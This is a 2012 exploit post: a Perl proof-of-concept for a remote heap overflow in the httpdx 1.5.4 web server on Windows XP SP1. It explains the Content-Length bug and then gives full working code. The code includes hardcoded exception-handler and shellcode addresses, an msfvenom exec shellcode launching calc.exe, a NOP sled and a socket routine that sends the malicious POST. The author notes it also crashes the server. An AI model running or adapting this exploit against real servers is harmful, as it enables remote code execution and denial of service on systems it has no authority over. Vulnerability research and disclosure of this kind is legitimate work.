
httpdx 1.5.4 Heap Overflow

Posted on 30 July 2012

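#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
#   where 'size' is actually the value of the "Content-Length" HTTP header.
#   All post-data will then be copied into this area using strncpy(x,y,size2),
#   where 'size2' = "request length" - "header length" (and not Content-Length).
#   The copy is therefore bounded by how much data the client actually sent,
#   not by the advertised Content-Length, so a body longer than Content-Length
#   overruns the heap chunk.
#
# - As httpdx uses its own handler function upon crash, this exploit overwrites
#   the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In both cases httpdx crashes
#   after the exploit, so even a failed attempt is a denial of service.
#
# - WinXP SP1
#   0x77ED73B4 --> UnhandledExceptionFilter()
#
# - The two addresses below ($veh_node_addr and $sc_ptr) are specific to
#   Windows XP SP1 English and to the heap layout the author observed; they
#   must be re-derived for any other build or configuration. Only run this
#   against systems you are authorised to test.
#======================================================================
use strict;
use warnings;
use IO::Socket::INET;

# Target. Host and port may be given on the command line
# (e.g. ./httpdx.pl 192.168.1.10 80); the defaults match the original script.
my $host = $ARGV[0] || "127.0.0.1";
my $port = $ARGV[1] || 80;

# The [perl|php|py|..] page to call during the POST request.
# The page must exist and its extension must be defined in the directive
# "http.handlers = {...}" in httpdx.conf, otherwise the vulnerable POST
# path is never reached.
my $page = "/test.pl";

# Windows XP - SP1 - English
# ---------------------------
# ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c;
# pointer to our shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;

# Content-Length we advertise: httpdx will malloc($content_length + 1) = 1024
# bytes. The body we actually send is $fill_length bytes of shellcode + NOPs
# followed by two 4-byte pointers, i.e. 1040 bytes, 16 bytes past the chunk.
my $content_length = 1023;
my $fill_length    = 1032;

# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
    "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
    "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
    "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
    "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
    "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
    "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
    "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
    "\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" .
    "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
    "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" .
    "\x65\x78\x65\x00";

# A payload longer than the fill region would silently produce a negative
# repeat count (empty NOP sled) and misplace the two pointers; refuse it.
die "shellcode is " . length($shellcode)
    . " bytes, exceeds the $fill_length-byte fill region\n"
    if length($shellcode) > $fill_length;

# flush STDOUT after every write so the echoed response appears immediately
$| = 1;

my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "connect to $host:$port failed: $@\n";

# HTTP/1.0 headers use CRLF line endings; the blank line ends the header block.
my $request =
    "POST $page HTTP/1.0\r\n" .
    "Content-Length: $content_length\r\n" .
    "Content-Type: text\r\n" .
    "Host: $host\r\n" .
    "\r\n" .
    # shellcode
    $shellcode .
    # nops, padding the body up to $fill_length bytes
    ("\x90" x ($fill_length - length($shellcode))) .
    # VEH addr (little-endian)
    pack('V', $veh_node_addr) .
    # ptr to shellcode (little-endian)
    pack('V', $sc_ptr);

print {$sock} $request;

# Echo whatever comes back, if anything (httpdx normally crashes instead).
while (my $line = <$sock>) {
    print $line;
}
close $sock;
exit;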

 
